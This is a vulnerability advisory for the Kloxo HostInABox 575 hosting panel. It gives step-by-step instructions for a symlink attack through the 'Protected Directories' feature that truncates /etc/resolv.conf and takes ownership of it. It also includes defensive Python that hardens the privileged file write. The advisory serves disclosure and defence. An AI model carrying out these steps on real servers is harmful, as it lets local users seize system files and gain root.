Kloxo HostInABox 575 - local users can truncate and control any file



DESCRIPTION


Local users can truncate and take over ownership of any file on the box via a symlink attack when specifying a "Virtual Directory" in the "Protected Directories" feature.



IMPACT


Local users could obtain root privileges.


STEPS TO REPRODUCE


1. As a local, unprivileged user, rename or remove the following directory: /home/httpd/example.com/__dirprotect
where "example.com" is the name of the domain for which we will be creating a protected directory.

2. cd /home/httpd/example.com/__dirprotect/
3. ln -s /etc/resolv.conf test_
4. Log into Kloxo
5. Click the "Protected Directories" link
6. In the "Auth Name" box, type anything
7. In the "Virtual Directory" box, type: test
8. Click "Add"


This is the result; note the ownership and the file size:

-rwxr-xr-x 1 user1 root 0 May 25 07:48 /etc/resolv.conf
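
A hardened form of the privileged write that the steps above abuse, as an added example (not Kloxo's code, which this advisory does not show). It assumes the panel, running as root, creates a file named after the "Virtual Directory" plus "_" inside the user-writable __dirprotect directory and then changes its ownership; safe_write and demo are hypothetical names, and the sample paths and contents are constructed.

```python
import os
import stat
import tempfile

def safe_write(dir_path, name, data, uid=-1, gid=-1):
    """Create or replace dir_path/name without following attacker-placed links."""
    # Pin the directory; O_NOFOLLOW rejects a symlink swapped in for it.
    dfd = os.open(dir_path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        # No O_TRUNC: nothing is truncated until the descriptor is validated.
        flags = os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW | os.O_NONBLOCK
        fd = os.open(name, flags, 0o600, dir_fd=dfd)  # ELOOP if name is a symlink
        try:
            st = os.fstat(fd)
            if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1:
                raise OSError("refusing: not a regular, single-link file")
            os.ftruncate(fd, 0)
            view = memoryview(data)
            while view:
                view = view[os.write(fd, view):]
            os.fchown(fd, uid, gid)  # acts on the open file; -1 leaves an id as is
        finally:
            os.close(fd)
    finally:
        os.close(dfd)

def demo():
    """Constructed scenario: a 'test_' symlink planted in a scratch directory."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "victim.conf")  # stands in for a system file
        with open(victim, "wb") as f:
            f.write(b"nameserver 192.0.2.1\n")
        prot = os.path.join(tmp, "__dirprotect")
        os.mkdir(prot)
        os.symlink(victim, os.path.join(prot, "test_"))
        try:
            safe_write(prot, "test_", b"user:hash\n")
            blocked = False
        except OSError:
            blocked = True
        with open(victim, "rb") as f:
            return blocked, f.read()

if __name__ == "__main__":
    print(demo())
```

Switching to the domain owner's uid before touching anything under the user's home directory is the stronger fix; the descriptor checks above cover the case where the write has to happen as root.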